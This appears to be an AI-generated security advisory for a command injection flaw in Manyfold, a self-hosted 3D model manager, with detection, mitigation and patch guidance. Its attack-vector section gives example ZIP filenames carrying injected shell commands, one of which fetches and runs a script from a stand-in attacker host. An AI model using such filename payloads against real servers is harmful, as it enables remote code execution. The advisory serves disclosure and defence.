CVE-2026-27635 Overview
CVE-2026-27635 is a command injection vulnerability in Manyfold, an open source, self-hosted web application for managing collections of 3D models, particularly focused on 3D printing. Prior to version 0.133.0, when model render generation is enabled, a logged-in user can achieve remote code execution (RCE) by uploading a ZIP file containing a file with a shell metacharacter in its name. The filename reaches a Ruby backtick call unsanitized, allowing arbitrary command execution on the host system.
Critical Impact
Authenticated attackers can achieve full remote code execution on the Manyfold server by uploading a maliciously crafted ZIP file with shell metacharacters in filenames, potentially compromising the entire hosting environment.
Affected Products
- Manyfold versions prior to 0.133.0
- Self-hosted Manyfold deployments with model render generation enabled
Discovery Timeline
- February 26, 2026 - CVE-2026-27635 published to NVD
- February 26, 2026 - Last updated in NVD database
Technical Details for CVE-2026-27635
Vulnerability Analysis
This vulnerability is classified as CWE-78 (OS Command Injection), one of the most severe vulnerability classes due to its potential for complete system compromise. The flaw exists in how Manyfold processes uploaded ZIP archives when the model render generation feature is active.
When a user uploads a ZIP file containing 3D models, the application extracts the files and processes them for render generation. During this process, filenames from the uploaded archive are passed to a Ruby backtick (`) call without proper sanitization. Ruby backticks execute the enclosed string as a shell command, making unsanitized user input in this context extremely dangerous.
An attacker with valid authentication credentials can craft a ZIP archive containing files with specially crafted names that include shell metacharacters such as backticks, semicolons, pipes, or command substitution syntax. When the application processes these filenames, the embedded commands execute with the privileges of the Manyfold application process.
Root Cause
The root cause of this vulnerability is improper input validation and the unsafe use of shell command execution in Ruby. The application fails to sanitize or escape filenames extracted from user-uploaded ZIP archives before passing them to Ruby's backtick operator. This allows shell metacharacters embedded in filenames to be interpreted as command syntax rather than literal characters.
The secure approach would involve using Ruby's Shellwords.escape() method or avoiding shell execution entirely by using direct API calls for file operations.
Attack Vector
The attack requires network access and valid user authentication to the Manyfold application. The attacker must:
- Authenticate to the Manyfold instance
- Create a ZIP archive containing a file with shell metacharacters in the filename (e.g., `whoami`.stl or ; curl attacker.com/shell.sh | bash ;.stl)
- Upload the malicious ZIP file as a 3D model
- Wait for the model render generation process to trigger the command execution
The complexity is elevated due to the requirement that model render generation must be enabled, but once these conditions are met, exploitation is straightforward and reliable.
For detailed technical information about the vulnerability mechanism, refer to the GitHub Security Advisory GHSA-p589-cf26-v7h2.
Detection Methods for CVE-2026-27635
Indicators of Compromise
- Presence of ZIP files with unusual filenames containing shell metacharacters (backticks, semicolons, pipes, $() patterns)
- Unexpected child processes spawned by the Manyfold application or Ruby interpreter
- Unusual network connections originating from the Manyfold server process
- System command execution logs showing commands run under the Manyfold service account context
Detection Strategies
- Monitor file upload activity for ZIP archives containing files with shell metacharacters in filenames
- Implement application-level logging to track all model uploads and render generation jobs
- Deploy endpoint detection to identify unexpected process execution chains from the Manyfold application
- Configure web application firewall rules to inspect uploaded archive contents for suspicious filename patterns
Monitoring Recommendations
- Enable verbose logging for the Manyfold application and review logs for anomalous filename patterns
- Set up alerts for any shell command execution originating from the Manyfold process context
- Monitor network egress from the Manyfold server for signs of reverse shell connections or data exfiltration
- Implement file integrity monitoring on critical system directories
How to Mitigate CVE-2026-27635
Immediate Actions Required
- Upgrade Manyfold to version 0.133.0 or later immediately
- If immediate upgrade is not possible, disable the model render generation feature until patching is complete
- Review upload logs for any suspicious ZIP files with unusual filenames
- Audit system for signs of compromise if the vulnerable feature was enabled
Patch Information
The vulnerability has been fixed in Manyfold version 0.133.0. The patch addresses the unsafe handling of filenames by implementing proper input sanitization before passing values to shell commands. Users should upgrade to this version or later to remediate the vulnerability.
For patch details, see the Manyfold Release v0.133.0.
Workarounds
- Disable model render generation in Manyfold settings until the patch can be applied
- Restrict user registration and access to trusted users only
- Implement network segmentation to limit the blast radius if the Manyfold server is compromised
- Deploy a web application firewall to filter uploaded content containing suspicious patterns
# Disable model render generation (configuration may vary based on deployment)
# Review your Manyfold configuration and disable render generation features
# Consult documentation at: https://github.com/manyfold3d/manyfold
# Restrict network egress from the Manyfold container/server
iptables -A OUTPUT -m owner --uid-owner manyfold -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
